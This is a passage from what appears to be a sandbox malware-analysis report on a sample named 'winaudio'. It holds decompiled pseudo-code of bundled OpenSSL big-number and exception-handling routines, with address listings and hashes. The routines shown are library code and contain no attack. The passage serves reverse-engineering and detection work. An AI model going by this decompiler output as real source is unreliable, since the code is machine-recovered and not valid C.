														if(_t147 == 0) {
															_t134 = _t134 - 0x50;
															goto L39;
														} else {
															_t70 = E00307180(_t124, _t128, 0x50);
															_t154 = _t154 + 8;
															__eflags = _t70;
															if(_t70 == 0) {
																goto L67;
															} else {
																_t119 =  *(_t154 + 0x1c);
																L39:
																_t101 =  *(_t154 + 0x14);
																__eflags = _t101;
																if(_t101 != 0) {
																	_t87 =  *(_t154 + 0x10);
																	__eflags = _t87 - 1;
																	if(_t87 > 1) {
																		 *_t101 = _t119 + 0x30;
																		_t101 = _t101 + 1;
																		_t88 = _t87 - 1;
																		__eflags = _t88;
																		 *(_t154 + 0x14) = _t101;
																		 *(_t154 + 0x10) = _t88;
																		 *_t101 = 0;
																	}
																}
																 *(_t154 + 0x18) =  *(_t154 + 0x18) + 1;
																L44:
																__eflags = _t147;
																if(__eflags == 0) {
																	_push(_t134);
																	_push(".%lu");
																	_t47 = _t154 + 0x34; // 0x6f
																	_push(0x1a);
																	E002F5C00(__eflags);
																	_t135 = _t154 + 0x3c;
																	_t154 = _t154 + 0x10;
																	_t49 = _t135 + 1; // 0x1
																	_t114 = _t49;
																	do {
																		_t75 =  *_t135;
																		_t135 = _t135 + 1;
																		__eflags = _t75;
																	} while (_t75 != 0);
																	_t136 = _t135 - _t114;
																	__eflags = _t101;
																	if(_t101 != 0) {
																		_t148 =  *(_t154 + 0x10);
																		__eflags = _t148;
																		if(_t148 > 0) {
																			E002FF680(_t101, _t154 + 0x30, _t148);
																			_t154 = _t154 + 0xc;
																			__eflags = _t136 - _t148;
																			if(_t136 <= _t148) {
																				_t102 = _t101 + _t136;
																				_t149 = _t148 - _t136;
																				__eflags = _t149;
																			} else {
																				_t102 = _t101 + _t148;
																				_t149 = 0;
																			}
																			 *(_t154 + 0x10) = _t149;
																			 *(_t154 + 0x14) = _t102;
																		}
																	}
																	_t54 = _t154 + 0x18;
																	 *_t54 =  *(_t154 + 0x18) + _t136;
																	__eflags =  *_t54;
																	goto L65;
																} else {
																	_push(_t128);
																	_t70 = E003076F0(__eflags);
																	_t154 = _t154 + 4;
																	 *(_t154 + 0x1c) = _t70;
																	__eflags = _t70;
																	if(_t70 == 0) {
																		goto L67;
																	} else {
																		_t138 = _t70;
																		_t39 = _t138 + 1; // 0x1
																		_t117 = _t39;
																		do {
																			_t81 =  *_t138;
																			_t138 = _t138 + 1;
																			__eflags = _t81;
																		} while (_t81 != 0);
																		_t139 = _t138 - _t117;
																		__eflags = _t101;
																		if(_t101 != 0) {
																			_t151 =  *(_t154 + 0x10);
																			__eflags = _t151 - 1;
																			if(_t151 > 1) {
																				 *_t101 = 0x2e;
																				_t101 = _t101 + 1;
																				_t151 = _t151 - 1;
																				__eflags = _t151;
																				 *_t101 = _t81;
																			}
																			E002FF680(_t101,  *(_t154 + 0x20), _t151);
																			_t154 = _t154 + 0xc;
																			__eflags = _t139 - _t151;
																			if(_t139 <= _t151) {
																				_t107 = _t101 + _t139;
																				_t152 = _t151 - _t139;
																				__eflags = _t152;
																			} else {
																				_t107 = _t101 + _t151;
																				_t152 = 0;
																			}
																			 *(_t154 + 0x10) = _t152;
																			 *(_t154 + 0x14) = _t107;
																		}
																		 *(_t154 + 0x1c) =  *(_t154 + 0x18) + 1 + _t139;
																		E002ECA70( *(_t154 + 0x1c));
																		_t154 = _t154 + 4;
																		L65:
																		_t111 =  *(_t154 + 0x20);
																		__eflags = _t111;
																		if(_t111 <= 0) {
																			__eflags = _t128;
																			if(_t128 != 0) {
																				E002F9760(_t128);
																				_t154 = _t154 + 4;
																			}
																			goto L72;
																		} else {
																			_t67 =  *(_t154 + 0x24);
																			goto L15;
																		}
																	}
																}
															}
														}
													}
												}
											} else {
												__eflags = _t147;
												if(_t147 != 0) {
													L29:
													_push(7);
													_push(_t128);
													_push(_t128);
													_t70 = E00307240(_t124, _t128);
													_t154 = _t154 + 0xc;
													__eflags = _t70;
													if(_t70 == 0) {
														goto L67;
													} else {
														_t67 =  *(_t154 + 0x24);
														_t111 =  *(_t154 + 0x20);
														_t100 =  *_t67;
														_t70 = _t67 + 1;
														_t111 = _t111 - 1;
														__eflags = _t111;
														 *(_t154 + 0x24) = _t67 + 1;
														 *(_t154 + 0x20) = _t111;
														if(_t111 != 0) {
															goto L18;
														}
													}
												} else {
													__eflags = _t134 - 0x1ffffff;
													if(_t134 <= 0x1ffffff) {
														_t67 =  *(_t154 + 0x24);
														_t134 = _t134 << 7;
														while(1) {
															_t100 =  *_t67;
															_t70 = _t67 + 1;
															_t111 = _t111 - 1;
															__eflags = _t111;
															 *(_t154 + 0x24) = _t67 + 1;
															 *(_t154 + 0x20) = _t111;
															if(_t111 != 0) {
																goto L18;
															}
															goto L17;
														}
													} else {
														__eflags = _t128;
														if(_t128 != 0) {
															L27:
															_t70 = E002F9A70(_t124, _t128, _t134);
															_t154 = _t154 + 8;
															__eflags = _t70;
															if(_t70 == 0) {
																goto L67;
															} else {
																_t147 = 1;
																goto L29;
															}
														} else {
															_t128 = E002F9890(_t124, _t128);
															__eflags = _t128;
															if(_t128 == 0) {
																goto L69;
															} else {
																goto L27;
															}
														}
													}
												}
											}
										}
									}
									goto L74;
								}
							}
						}
					} else {
						_push(_t126);
						_t89 = E002F0520(_t124);
						_t154 = _t154 + 4;
						 *(_t154 + 0x1c) = _t89;
						if(_t89 == 0) {
							goto L14;
						} else {
							_push(_t89);
							_t140 = E002F0360(_t124, _t126);
							_t158 = _t154 + 4;
							if(_t140 != 0) {
								L9:
								if(_t97 != 0) {
									E002FF680(_t97, _t140, _t144);
									_t158 = _t158 + 0xc;
								}
								goto L12;
								L12:
								_t91 =  *_t140;
								_t140 = _t140 + 1;
								if(_t91 != 0) {
									goto L12;
								} else {
									_pop(_t142);
									return E002E056D( *(_t158 + 0x38) ^ _t158, _t124, _t142);
								}
							} else {
								_push( *((intOrPtr*)(_t158 + 0x1c)));
								_t140 = E002F0490(_t124, _t126);
								_t154 = _t158 + 4;
								if(_t140 == 0) {
									goto L14;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				L74:
			}










































                        0x002f05e0
                        0x002f05e5
                        0x002f05ea
                        0x002f05f1
                        0x002f05f6
                        0x002f05fa
                        0x002f05fe
                        0x002f0607
                        0x002f060b
                        0x002f060f
                        0x002f0610
                        0x002f0616
                        0x002f061c
                        0x002f061c
                        0x002f0621
                        0x002f0915
                        0x002f091f
                        0x002f0631
                        0x002f0636
                        0x002f0637
                        0x002f069e
                        0x002f069e
                        0x002f06a1
                        0x002f06a4
                        0x002f06a6
                        0x002f06ae
                        0x002f06b0
                        0x002f08f5
                        0x002f08f9
                        0x002f0901
                        0x002f090b
                        0x00000000
                        0x002f06b6
                        0x002f06b6
                        0x002f06b6
                        0x002f06b8
                        0x002f06ba
                        0x002f06c0
                        0x002f06c0
                        0x002f06c2
                        0x002f06c3
                        0x002f06c3
                        0x002f06c6
                        0x002f06ca
                        0x002f06ce
                        0x00000000
                        0x00000000
                        0x002f06d0
                        0x002f06d0
                        0x002f06d2
                        0x002f08c5
                        0x002f08c5
                        0x002f08c7
                        0x002f08ca
                        0x002f08cf
                        0x002f08cf
                        0x002f08d2
                        0x002f08d2
                        0x002f08dd
                        0x002f08e7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f06d8
                        0x002f06db
                        0x002f06de
                        0x002f06e0
                        0x002f06fa
                        0x002f06fa
                        0x00000000
                        0x002f06e2
                        0x002f06e4
                        0x002f06e9
                        0x002f06ec
                        0x002f06ee
                        0x00000000
                        0x002f06f4
                        0x002f06f4
                        0x002f06fc
                        0x002f06fc
                        0x002f06fe
                        0x002f0763
                        0x002f0768
                        0x002f07dc
                        0x00000000
                        0x002f076a
                        0x002f076a
                        0x002f0772
                        0x002f0775
                        0x002f07a7
                        0x002f07ab
                        0x002f07b1
                        0x002f07b1
                        0x00000000
                        0x002f0777
                        0x002f0777
                        0x002f077c
                        0x002f0780
                        0x002f0782
                        0x002f079d
                        0x00000000
                        0x002f0784
                        0x002f0787
                        0x002f078c
                        0x002f078f
                        0x002f0791
                        0x00000000
                        0x002f0797
                        0x002f0797
                        0x002f07b3
                        0x002f07b3
                        0x002f07b7
                        0x002f07b9
                        0x002f07bb
                        0x002f07bf
                        0x002f07c2
                        0x002f07c7
                        0x002f07c9
                        0x002f07ca
                        0x002f07ca
                        0x002f07cb
                        0x002f07cf
                        0x002f07d3
                        0x002f07d3
                        0x002f07c2
                        0x002f07d6
                        0x002f07e0
                        0x002f07e0
                        0x002f07e2
                        0x002f085a
                        0x002f085b
                        0x002f0860
                        0x002f0864
                        0x002f0867
                        0x002f086c
                        0x002f0870
                        0x002f0873
                        0x002f0873
                        0x002f0876
                        0x002f0876
                        0x002f0878
                        0x002f0879
                        0x002f0879
                        0x002f087d
                        0x002f087f
                        0x002f0881
                        0x002f0883
                        0x002f0887
                        0x002f0889
                        0x002f0892
                        0x002f0897
                        0x002f089a
                        0x002f089c
                        0x002f08a4
                        0x002f08a6
                        0x002f08a6
                        0x002f089e
                        0x002f089e
                        0x002f08a0
                        0x002f08a0
                        0x002f08a8
                        0x002f08ac
                        0x002f08ac
                        0x002f0889
                        0x002f08b0
                        0x002f08b0
                        0x002f08b0
                        0x00000000
                        0x002f07e4
                        0x002f07e4
                        0x002f07e5
                        0x002f07ea
                        0x002f07ed
                        0x002f07f1
                        0x002f07f3
                        0x00000000
                        0x002f07f9
                        0x002f07f9
                        0x002f07fb
                        0x002f07fb
                        0x002f0800
                        0x002f0800
                        0x002f0802
                        0x002f0803
                        0x002f0803
                        0x002f0807
                        0x002f0809
                        0x002f080b
                        0x002f080d
                        0x002f0811
                        0x002f0814
                        0x002f0816
                        0x002f0819
                        0x002f081a
                        0x002f081a
                        0x002f081b
                        0x002f081b
                        0x002f0823
                        0x002f0828
                        0x002f082b
                        0x002f082d
                        0x002f0835
                        0x002f0837
                        0x002f0837
                        0x002f082f
                        0x002f082f
                        0x002f0831
                        0x002f0831
                        0x002f0839
                        0x002f083d
                        0x002f083d
                        0x002f084c
                        0x002f0850
                        0x002f0855
                        0x002f08b4
                        0x002f08b4
                        0x002f08b8
                        0x002f08ba
                        0x002f08e8
                        0x002f08ea
                        0x002f08ed
                        0x002f08f2
                        0x002f08f2
                        0x00000000
                        0x002f08bc
                        0x002f08bc
                        0x00000000
                        0x002f08bc
                        0x002f08ba
                        0x002f07f3
                        0x002f07e2
                        0x002f0791
                        0x002f0782
                        0x002f0775
                        0x002f0700
                        0x002f0700
                        0x002f0702
                        0x002f0736
                        0x002f0736
                        0x002f0738
                        0x002f0739
                        0x002f073a
                        0x002f073f
                        0x002f0742
                        0x002f0744
                        0x00000000
                        0x002f074a
                        0x002f074a
                        0x002f074e
                        0x002f06c0
                        0x002f06c2
                        0x002f06c3
                        0x002f06c3
                        0x002f06c6
                        0x002f06ca
                        0x002f06ce
                        0x00000000
                        0x00000000
                        0x002f06ce
                        0x002f0704
                        0x002f0704
                        0x002f070a
                        0x002f0757
                        0x002f075b
                        0x002f06c0
                        0x002f06c0
                        0x002f06c2
                        0x002f06c3
                        0x002f06c3
                        0x002f06c6
                        0x002f06ca
                        0x002f06ce
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f06ce
                        0x002f070c
                        0x002f070c
                        0x002f070e
                        0x002f071f
                        0x002f0721
                        0x002f0726
                        0x002f0729
                        0x002f072b
                        0x00000000
                        0x002f0731
                        0x002f0731
                        0x00000000
                        0x002f0731
                        0x002f0710
                        0x002f0715
                        0x002f0717
                        0x002f0719
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f0719
                        0x002f070e
                        0x002f070a
                        0x002f0702
                        0x002f06fe
                        0x002f06ee
                        0x00000000
                        0x002f06e0
                        0x002f06c0
                        0x002f06b6
                        0x002f0639
                        0x002f0639
                        0x002f063a
                        0x002f063f
                        0x002f0642
                        0x002f0648
                        0x00000000
                        0x002f064a
                        0x002f064a
                        0x002f0650
                        0x002f0652
                        0x002f0657
                        0x002f066b
                        0x002f066d
                        0x002f0672
                        0x002f0677
                        0x002f0677
                        0x002f067a
                        0x002f0680
                        0x002f0680
                        0x002f0682
                        0x002f0685
                        0x00000000
                        0x002f0687
                        0x002f068b
                        0x002f069d
                        0x002f069d
                        0x002f0659
                        0x002f0659
                        0x002f0662
                        0x002f0664
                        0x002f0669
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002f0669
                        0x002f0657
                        0x002f0648
                        0x002f0637
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID: .%lu$ooo
                        • API String ID: 0-166504061
                        • Opcode ID: 2e95456da4db681331f9a79488c4e62c20036f1c4cd8d50ad930b8fe3725b6eb
                        • Instruction ID: 872429da916a552d6e3c5c806283d1dd6c4061a8cbe2bd208a41fc02d43b929e
                        • Opcode Fuzzy Hash: 2e95456da4db681331f9a79488c4e62c20036f1c4cd8d50ad930b8fe3725b6eb
                        • Instruction Fuzzy Hash: 4C91097192830A8BD7209E6599C173BF7E8AF957C0F44093DFA8593243EB61D924CED2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0039762F Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0039762F(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0039575B(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E003956C1(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                        0x0039763d
                        0x00397644
                        0x00397649
                        0x0039764f
                        0x00397652
                        0x00397658
                        0x0039765d
                        0x00397662
                        0x00397662
                        0x00397668
                        0x0039766d
                        0x00397672
                        0x00397672
                        0x00397679
                        0x0039767e
                        0x00397683
                        0x00397683
                        0x0039768a
                        0x0039768f
                        0x00397694
                        0x00397694
                        0x0039769b
                        0x003976a0
                        0x003976a5
                        0x003976a5
                        0x003976ad
                        0x003976bd
                        0x003976cf
                        0x003976e1
                        0x003976f4
                        0x00397706
                        0x0039770e
                        0x00397713
                        0x00397718
                        0x00397718
                        0x0039771f
                        0x00397724
                        0x00397724
                        0x0039772b
                        0x00397730
                        0x00397730
                        0x00397737
                        0x0039773c
                        0x0039773c
                        0x00397743
                        0x00397748
                        0x00397748
                        0x00397752
                        0x00397754
                        0x0039778e
                        0x00397756
                        0x0039775b
                        0x0039777f
                        0x00397787
                        0x0039777b
                        0x0039777b
                        0x00397791
                        0x00397798
                        0x0039779a
                        0x003977bc
                        0x003977c4
                        0x003977c7
                        0x003977c7
                        0x003977c9
                        0x003977c9
                        0x003977d4
                        0x003977da
                        0x003977df
                        0x003977e6
                        0x00397820
                        0x0039782b
                        0x00397831
                        0x00397834
                        0x00397837
                        0x00397843
                        0x0039784b
                        0x003977e8
                        0x003977eb
                        0x003977f7
                        0x003977fd
                        0x00397803
                        0x00397806
                        0x0039780f
                        0x0039780f
                        0x0039784e
                        0x0039785c
                        0x00397862
                        0x00397869
                        0x0039786b
                        0x0039786b
                        0x00397872
                        0x00397874
                        0x00397874
                        0x0039787b
                        0x0039787d
                        0x0039787d
                        0x00397884
                        0x00397886
                        0x00397886
                        0x0039788d
                        0x0039788f
                        0x0039788f
                        0x0039789c
                        0x0039789f
                        0x003978d6
                        0x003978a1
                        0x003978a1
                        0x003978a4
                        0x003978cf
                        0x003978c4
                        0x003978c4
                        0x003978d8
                        0x003978e0
                        0x003978e3
                        0x00397902
                        0x00397907
                        0x00397907
                        0x00397909
                        0x0039790e
                        0x0039791a
                        0x00397910
                        0x00397913
                        0x00397913
                        0x0039791f
                        0x0039791f
                        0x003978e5
                        0x003978e8
                        0x003978f7
                        0x00000000
                        0x003978f7
                        0x003978ea
                        0x003978ed
                        0x003978ef
                        0x003978ef
                        0x00000000
                        0x003978ed
                        0x003978a6
                        0x003978a9
                        0x003978bf
                        0x00000000
                        0x003978bf
                        0x003978ae
                        0x003978b0
                        0x003978b0
                        0x003978ae
                        0x00000000
                        0x0039789f
                        0x003977a1
                        0x003977af
                        0x003977b7
                        0x00000000
                        0x003977b7
                        0x003977a5
                        0x003977aa
                        0x003977aa
                        0x00000000
                        0x003977a5
                        0x00397762
                        0x00397770
                        0x00397778
                        0x00000000
                        0x00397778
                        0x00397766
                        0x0039776b
                        0x0039776b
                        0x00397766

                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0039762A,?,?,00000008,?,?,003972CA,00000000), ref: 0039785C
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: 5fdead370154c73b321f58cdcb1277ae5c6a6af97ce3fbf842b7a48b1262309c
                        • Instruction ID: d99aaedaf2a9aa20f6fa122ddbdc1cb872e0bd9d93bac996a7f5afe75cc2e83f
                        • Opcode Fuzzy Hash: 5fdead370154c73b321f58cdcb1277ae5c6a6af97ce3fbf842b7a48b1262309c
                        • Instruction Fuzzy Hash: 5CB13F35624609DFDB1ACF28C48AB657BE0FF45364F268658E899CF2E1C335D991CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00324AD0 Relevance: 1.8, Strings: 1, Instructions: 517COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E00324AD0(void* __ebx, signed int __edx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int** _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				void* _v108;
				void* __esi;
				void* __ebp;
				signed int _t184;
				signed char* _t186;
				signed int _t193;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				void* _t204;
				signed int* _t213;
				signed int* _t215;
				signed int _t216;
				signed int _t220;
				signed int _t222;
				signed int _t223;
				char* _t225;
				signed int _t226;
				signed int _t228;
				signed int _t230;
				signed int _t231;
				signed int _t234;
				signed int _t236;
				char* _t237;
				signed int _t238;
				void* _t239;
				signed int _t240;
				signed int _t242;
				char* _t244;
				signed int _t245;
				void* _t246;
				char* _t247;
				signed int _t249;
				signed int _t251;
				signed int _t255;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t262;
				void* _t265;
				char _t269;
				signed int _t272;
				intOrPtr _t275;
				signed int _t277;
				signed char** _t289;
				signed int _t291;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				intOrPtr* _t298;
				signed int _t299;
				signed int** _t311;
				signed int _t312;
				signed int** _t316;
				signed int _t318;
				signed int _t327;
				void* _t330;
				signed int _t333;
				intOrPtr _t334;
				signed int _t335;
				void* _t336;
				void* _t337;
				signed int _t338;
				void* _t342;
				void* _t343;
				void* _t344;
				signed int _t345;
				void* _t348;
				void* _t350;
				signed int _t351;
				void* _t352;
				void* _t355;
				signed int _t356;
				void* _t359;

				_t323 = __edx;
				E00397C10();
				_t184 =  *0x3e1008; // 0x847b54ee
				_v8 = _t184 ^ _t351;
				_t289 = _a16;
				_push(__edi);
				_t327 = 0;
				_v72 = 0;
				_t186 = _t289[1];
				_v36 = 0;
				_v24 = 0;
				_v20 = _t186;
				if(_t186 <= 0 || ( *( *_t289) & 0x00000001) == 0) {
					E002E5840(_t323, _t327, __eflags, 3, 0x7c, 0x66, ".\\crypto\\bn\\bn_exp.c", 0x2d4);
					_pop(_t342);
					__eflags = _v8 ^ _t351;
					return E002E056D(_v8 ^ _t351, _t323, _t342);
				} else {
					_t343 = E002F98F0(_a12);
					_t355 = _t352 + 4;
					if(_t343 != 0) {
						E00300350(0, _a20);
						_t193 = _a24;
						_t356 = _t355 + 4;
						__eflags = _t193;
						if(_t193 == 0) {
							_t291 = E0030A9A0();
							_v12 = _t291;
							__eflags = _t291;
							if(_t291 != 0) {
								_push(_a20);
								_push(_a16);
								_push(_t291);
								_t198 = E0030AA00(_t323);
								_t356 = _t356 + 0xc;
								__eflags = _t198;
								if(_t198 == 0) {
									goto L46;
								} else {
									goto L12;
								}
								goto L48;
							}
						} else {
							_v12 = _t193;
							L12:
							__eflags = _t343 - 0x3a9;
							if(_t343 <= 0x3a9) {
								__eflags = _t343 - 0x132;
								if(_t343 <= 0x132) {
									__eflags = _t343 - 0x59;
									if(_t343 <= 0x59) {
										__eflags = _t343 - 0x16;
										_t27 = _t343 - 0x16 > 0;
										__eflags = _t27;
										_t295 = 1 + (0 | _t27) * 2;
									} else {
										_t295 = 4;
									}
								} else {
									_t295 = 5;
								}
							} else {
								_t295 = 6;
							}
							_t203 = _v20;
							_v28 = _t295;
							_t323 = 1 << _t295;
							_v68 = 1;
							_t330 = _t203 + _t203;
							__eflags = _t330 - 1;
							_t331 =  <=  ? 1 : _t330;
							_t332 = ( <=  ? 1 : _t330) + 1;
							_v32 = 1 * _t203;
							_t333 = ( <=  ? 1 : _t330) + 1 << 2;
							_v36 = _t333;
							_t36 = _t333 + 0x40; // 0x40
							_t204 = _t36;
							__eflags = _t333 - 0xc00;
							if(_t333 >= 0xc00) {
								_t327 = E002ECAF0(_t204, ".\\crypto\\bn\\bn_exp.c", 0x335);
								_t356 = _t356 + 0xc;
								__eflags = _t327;
								if(_t327 == 0) {
									goto L44;
								} else {
									goto L22;
								}
							} else {
								E00397C40();
								_t327 = _t356;
								L22:
								_v24 = (_t327 & 0xffffffc0) + 0x40;
								E0037E1A0(_t327, (_t327 & 0xffffffc0) + 0x40, 0, _v36);
								_t323 = _v20;
								_t359 = _t356 + 0xc;
								__eflags = _v36 - 0xc00;
								_v88 = 0;
